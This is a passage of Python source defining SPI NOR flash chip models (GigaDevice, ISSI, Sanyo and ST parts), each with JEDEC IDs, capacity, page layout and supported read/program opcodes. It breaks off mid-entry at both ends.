page_size = 256 # bytes
total_pages = 32768
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class GD25Q64C(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.GIGADEVICE
device_id = 0x4017
name = "gd25q64c"
total_size = 8388608 # bytes
page_size = 256 # bytes
total_pages = 32768
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class GD25Q80(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.GIGADEVICE
device_id = 0x4014
name = "gd25q80"
total_size = 1048576 # bytes
page_size = 256 # bytes
total_pages = 4096
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class GD25Q80B(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.GIGADEVICE
device_id = 0x4014
name = "gd25q80b"
total_size = 1048576 # bytes
page_size = 256 # bytes
total_pages = 4096
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class GD25T80(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.GIGADEVICE
device_id = 0x3114
name = "gd25t80"
total_size = 1048576 # bytes
page_size = 256 # bytes
total_pages = 4096
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class GD25VQ16C(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.GIGADEVICE
device_id = 0x4215
name = "gd25vq16c"
total_size = 2097152 # bytes
page_size = 256 # bytes
total_pages = 8192
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
]
dummy_bits = 8
class GD25VQ21B(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.GIGADEVICE
device_id = 0x4212
name = "gd25vq21b"
total_size = 262144 # bytes
page_size = 256 # bytes
total_pages = 1024
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
]
dummy_bits = 8
class GD25VQ41B(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.GIGADEVICE
device_id = 0x4213
name = "gd25vq41b"
total_size = 524288 # bytes
page_size = 256 # bytes
total_pages = 2048
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
]
dummy_bits = 8
class GD25VQ80C(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.GIGADEVICE
device_id = 0x4214
name = "gd25vq80c"
total_size = 1048576 # bytes
page_size = 256 # bytes
total_pages = 4096
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
]
dummy_bits = 8
class GD25WQ80E(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.GIGADEVICE
device_id = 0x6514
name = "gd25wq80e"
total_size = 1048576 # bytes
page_size = 256 # bytes
total_pages = 4096
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class IS25CD512(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.NONJEDEC
device_id = 0x0020
name = "is25cd512"
total_size = 65536 # bytes
page_size = 256 # bytes
total_pages = 256
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class IS25LP016D(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ISSI
device_id = 0x6015
name = "is25lp016d"
total_size = 2097152 # bytes
page_size = 256 # bytes
total_pages = 8192
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_2,
SpiNorFlashOpCodes.PP_1_1_2,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
]
dummy_bits = 8
class IS25LP032(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ISSI
device_id = 0x6016
name = "is25lp032"
total_size = 4194304 # bytes
page_size = 256 # bytes
total_pages = 16384
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_2,
SpiNorFlashOpCodes.PP_1_1_2,
]
dummy_bits = 8
class IS25LP064(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ISSI
device_id = 0x6017
name = "is25lp064"
total_size = 8388608 # bytes
page_size = 256 # bytes
total_pages = 32768
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_2,
SpiNorFlashOpCodes.PP_1_1_2,
]
dummy_bits = 8
class IS25LP080D(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ISSI
device_id = 0x6014
name = "is25lp080d"
total_size = 1048576 # bytes
page_size = 256 # bytes
total_pages = 4096
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_2,
SpiNorFlashOpCodes.PP_1_1_2,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
]
dummy_bits = 8
class IS25LP128(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ISSI
device_id = 0x6018
name = "is25lp128"
total_size = 16777216 # bytes
page_size = 256 # bytes
total_pages = 65536
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_2,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_2,
]
dummy_bits = 8
class IS25LP128D(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ISSI
device_id = 0x6018
name = "is25lp128d"
total_size = 16777216 # bytes
page_size = 256 # bytes
total_pages = 65536
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class IS25LP256(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ISSI
device_id = 0x6019
name = "is25lp256"
total_size = 33554432 # bytes
page_size = 256 # bytes
total_pages = 131072
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_2,
SpiNorFlashOpCodes.PP_1_1_2,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
SpiNorFlashOpCodes.READ_1_1_1_4B,
SpiNorFlashOpCodes.PP_1_1_1_4B,
SpiNorFlashOpCodes.READ_1_1_1_FAST_4B,
SpiNorFlashOpCodes.READ_1_1_2_4B,
SpiNorFlashOpCodes.READ_1_1_4_4B,
SpiNorFlashOpCodes.PP_1_1_4_4B,
]
dummy_bits = 8
class IS25LP256D(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ISSI
device_id = 0x6019
name = "is25lp256d"
total_size = 33554432 # bytes
page_size = 256 # bytes
total_pages = 131072
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class IS25LP512M(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ISSI
device_id = 0x601a
name = "is25lp512m"
total_size = 67108864 # bytes
page_size = 256 # bytes
total_pages = 262144
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_2,
SpiNorFlashOpCodes.PP_1_1_2,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
]
dummy_bits = 8
class IS25LQ040B(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ISSI
device_id = 0x4013
name = "is25lq040b"
total_size = 524288 # bytes
page_size = 256 # bytes
total_pages = 2048
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_2,
SpiNorFlashOpCodes.PP_1_1_2,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
]
dummy_bits = 8
class IS25WP032(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ISSI
device_id = 0x7016
name = "is25wp032"
total_size = 4194304 # bytes
page_size = 256 # bytes
total_pages = 16384
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_2,
SpiNorFlashOpCodes.PP_1_1_2,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
]
dummy_bits = 8
class IS25WP064(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ISSI
device_id = 0x7017
name = "is25wp064"
total_size = 8388608 # bytes
page_size = 256 # bytes
total_pages = 32768
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_2,
SpiNorFlashOpCodes.PP_1_1_2,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
]
dummy_bits = 8
class IS25WP128(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ISSI
device_id = 0x7018
name = "is25wp128"
total_size = 16777216 # bytes
page_size = 256 # bytes
total_pages = 65536
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_2,
SpiNorFlashOpCodes.PP_1_1_2,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
]
dummy_bits = 8
class IS25WP128D(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ISSI
device_id = 0x7018
name = "is25wp128d"
total_size = 16777216 # bytes
page_size = 256 # bytes
total_pages = 65536
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class IS25WP256(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ISSI
device_id = 0x7019
name = "is25wp256"
total_size = 33554432 # bytes
page_size = 256 # bytes
total_pages = 131072
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_2,
SpiNorFlashOpCodes.PP_1_1_2,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
SpiNorFlashOpCodes.READ_1_1_1_4B,
SpiNorFlashOpCodes.PP_1_1_1_4B,
SpiNorFlashOpCodes.READ_1_1_1_FAST_4B,
SpiNorFlashOpCodes.READ_1_1_2_4B,
SpiNorFlashOpCodes.READ_1_1_4_4B,
SpiNorFlashOpCodes.PP_1_1_4_4B,
]
dummy_bits = 8
class IS25WP256D(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ISSI
device_id = 0x7019
name = "is25wp256d"
total_size = 33554432 # bytes
page_size = 256 # bytes
total_pages = 131072
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class IS25WP512M(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ISSI
device_id = 0x701a
name = "is25wp512m"
total_size = 67108864 # bytes
page_size = 256 # bytes
total_pages = 262144
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_2,
SpiNorFlashOpCodes.PP_1_1_2,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
]
dummy_bits = 8
class LE25FU106B(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.SANYO
device_id = 0x001d
name = "le25fu106b"
total_size = 131072 # bytes
page_size = 256 # bytes
total_pages = 512
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class LE25FU206(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.SANYO
device_id = 0x0044
name = "le25fu206"
total_size = 262144 # bytes
page_size = 256 # bytes
total_pages = 1024
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class LE25FU206A(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.SANYO
device_id = 0x0612
name = "le25fu206a"
total_size = 262144 # bytes
page_size = 256 # bytes
total_pages = 1024
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class LE25FU406B(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.SANYO
device_id = 0x001e
name = "le25fu406b"
total_size = 524288 # bytes
page_size = 256 # bytes
total_pages = 2048
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class LE25FU406C(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.SANYO
device_id = 0x0613
name = "le25fu406c"
total_size = 524288 # bytes
page_size = 256 # bytes
total_pages = 2048
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
# --- Sanyo LE25 series ---
# Generated ID-table entries: each class records the JEDEC manufacturer/device
# ID, capacity (total_pages * page_size == total_size), supported SPI opcodes,
# and dummy cycle count for one part number.
class LE25FW106(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.SANYO
    device_id = 0x0015
    name = "le25fw106"
    total_size = 131072 # bytes
    page_size = 256 # bytes
    total_pages = 512
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class LE25FW203A(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.SANYO
    device_id = 0x1600
    name = "le25fw203a"
    total_size = 262144 # bytes
    page_size = 256 # bytes
    total_pages = 1024
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class LE25FW403A(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.SANYO
    device_id = 0x1100
    name = "le25fw403a"
    total_size = 524288 # bytes
    page_size = 256 # bytes
    total_pages = 2048
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class LE25FW406A(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.SANYO
    device_id = 0x001a
    name = "le25fw406a"
    total_size = 524288 # bytes
    page_size = 256 # bytes
    total_pages = 2048
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class LE25FW418A(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.SANYO
    device_id = 0x0010
    name = "le25fw418a"
    total_size = 524288 # bytes
    page_size = 256 # bytes
    total_pages = 2048
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class LE25FW806(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.SANYO
    device_id = 0x0026
    name = "le25fw806"
    total_size = 1048576 # bytes
    page_size = 256 # bytes
    total_pages = 4096
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class LE25FW808(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.SANYO
    device_id = 0x0020
    name = "le25fw808"
    total_size = 1048576 # bytes
    page_size = 256 # bytes
    total_pages = 4096
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class LE25U40CMC(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.SANYO
    device_id = 0x0613
    name = "le25u40cmc"
    total_size = 524288 # bytes
    page_size = 256 # bytes
    total_pages = 2048
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
# --- ST M25P series ---
# Generated ID-table entries. Several parts appear in three flavors:
# the plain JEDEC entry, an "-a" revision sharing the same device_id, and a
# "-nonjedec" entry (manufacturer NONJEDEC, device_id 0x0000) for parts that
# do not answer a JEDEC READ-ID and must be matched out-of-band.
class M25P05(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.ST
    device_id = 0x2010
    name = "m25p05"
    total_size = 65536 # bytes
    page_size = 256 # bytes
    total_pages = 256
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
    ]
    dummy_bits = 8
class M25P05_A(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.ST
    device_id = 0x2010
    name = "m25p05-a"
    total_size = 65536 # bytes
    page_size = 256 # bytes
    total_pages = 256
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
# device_id 0x0000: part is not JEDEC-identifiable.
class M25P05_NONJEDEC(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.NONJEDEC
    device_id = 0x0000
    name = "m25p05-nonjedec"
    total_size = 65536 # bytes
    page_size = 256 # bytes
    total_pages = 256
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
    ]
    dummy_bits = 8
class M25P10(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.ST
    device_id = 0x2011
    name = "m25p10"
    total_size = 131072 # bytes
    page_size = 256 # bytes
    total_pages = 512
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
    ]
    dummy_bits = 8
class M25P10_A(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.ST
    device_id = 0x2011
    name = "m25p10-a"
    total_size = 131072 # bytes
    page_size = 256 # bytes
    total_pages = 512
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class M25P10_NONJEDEC(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.NONJEDEC
    device_id = 0x0000
    name = "m25p10-nonjedec"
    total_size = 131072 # bytes
    page_size = 256 # bytes
    total_pages = 512
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
    ]
    dummy_bits = 8
class M25P128(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.ST
    device_id = 0x2018
    name = "m25p128"
    total_size = 16777216 # bytes
    page_size = 256 # bytes
    total_pages = 65536
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
    ]
    dummy_bits = 8
class M25P128_NONJEDEC(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.NONJEDEC
    device_id = 0x0000
    name = "m25p128-nonjedec"
    total_size = 16777216 # bytes
    page_size = 256 # bytes
    total_pages = 65536
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
    ]
    dummy_bits = 8
class M25P16(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.ST
    device_id = 0x2015
    name = "m25p16"
    total_size = 2097152 # bytes
    page_size = 256 # bytes
    total_pages = 8192
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
    ]
    dummy_bits = 8
class M25P16_NONJEDEC(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.NONJEDEC
    device_id = 0x0000
    name = "m25p16-nonjedec"
    total_size = 2097152 # bytes
    page_size = 256 # bytes
    total_pages = 8192
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
    ]
    dummy_bits = 8
class M25P20(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.ST
    device_id = 0x2012
    name = "m25p20"
    total_size = 262144 # bytes
    page_size = 256 # bytes
    total_pages = 1024
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
    ]
    dummy_bits = 8
class M25P20_NONJEDEC(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.NONJEDEC
    device_id = 0x0000
    name = "m25p20-nonjedec"
    total_size = 262144 # bytes
    page_size = 256 # bytes
    total_pages = 1024
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
    ]
    dummy_bits = 8
# "-old" entries carry the legacy (pre-JEDEC-standard) device_id for the part.
class M25P20_OLD(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.ST
    device_id = 0x0011
    name = "m25p20-old"
    total_size = 262144 # bytes
    page_size = 256 # bytes
    total_pages = 1024
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class M25P32(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.ST
    device_id = 0x2016
    name = "m25p32"
    total_size = 4194304 # bytes
    page_size = 256 # bytes
    total_pages = 16384
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
    ]
    dummy_bits = 8
class M25P32_NONJEDEC(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.NONJEDEC
    device_id = 0x0000
    name = "m25p32-nonjedec"
    total_size = 4194304 # bytes
    page_size = 256 # bytes
    total_pages = 16384
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
    ]
    dummy_bits = 8
class M25P40(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.ST
    device_id = 0x2013
    name = "m25p40"
    total_size = 524288 # bytes
    page_size = 256 # bytes
    total_pages = 2048
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
    ]
    dummy_bits = 8
class M25P40_NONJEDEC(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.NONJEDEC
    device_id = 0x0000
    name = "m25p40-nonjedec"
    total_size = 524288 # bytes
    page_size = 256 # bytes
    total_pages = 2048
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
    ]
    dummy_bits = 8
class M25P40_OLD(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.ST
    device_id = 0x0012
    name = "m25p40-old"
    total_size = 524288 # bytes
    page_size = 256 # bytes
    total_pages = 2048
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class M25P64(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.ST
    device_id = 0x2017
    name = "m25p64"
    total_size = 8388608 # bytes
    page_size = 256 # bytes
    total_pages = 32768
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
    ]
    dummy_bits = 8
class M25P64_NONJEDEC(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.NONJEDEC
    device_id = 0x0000
    name = "m25p64-nonjedec"
    total_size = 8388608 # bytes
    page_size = 256 # bytes
    total_pages = 32768
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
    ]
    dummy_bits = 8
class M25P80(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.ST
    device_id = 0x2014
    name = "m25p80"
    total_size = 1048576 # bytes
    page_size = 256 # bytes
    total_pages = 4096
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
    ]
    dummy_bits = 8
class M25P80_NONJEDEC(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.NONJEDEC
    device_id = 0x0000
    name = "m25p80-nonjedec"
    total_size = 1048576 # bytes
    page_size = 256 # bytes
    total_pages = 4096
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
    ]
    dummy_bits = 8
# --- ST M25PE series (0x80xx device IDs) ---
# Generated ID-table entries; total_pages * page_size == total_size throughout.
class M25PE10(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.ST
    device_id = 0x8011
    name = "m25pe10"
    total_size = 131072 # bytes
    page_size = 256 # bytes
    total_pages = 512
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
    ]
    dummy_bits = 8
class M25PE16(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.ST
    device_id = 0x8015
    name = "m25pe16"
    total_size = 2097152 # bytes
    page_size = 256 # bytes
    total_pages = 8192
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
    ]
    dummy_bits = 8
class M25PE20(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.ST
    device_id = 0x8012
    name = "m25pe20"
    total_size = 262144 # bytes
    page_size = 256 # bytes
    total_pages = 1024
    supported_opcodes = [
        SpiNorFlashOpCodes.READ_1_1_1,
        SpiNorFlashOpCodes.PP_1_1_1,
        SpiNorFlashOpCodes.READ_1_1_1_FAST,
    ]
    dummy_bits = 8
class M25PE40(SpiNorFlashModule):
    manufacturer_id = SpiNorFlashManufacturerIDs.ST
    device_id = 0x8013
    name = "m25pe40"
    total_size = 524288 # bytes
    page_size = 256 # bytes
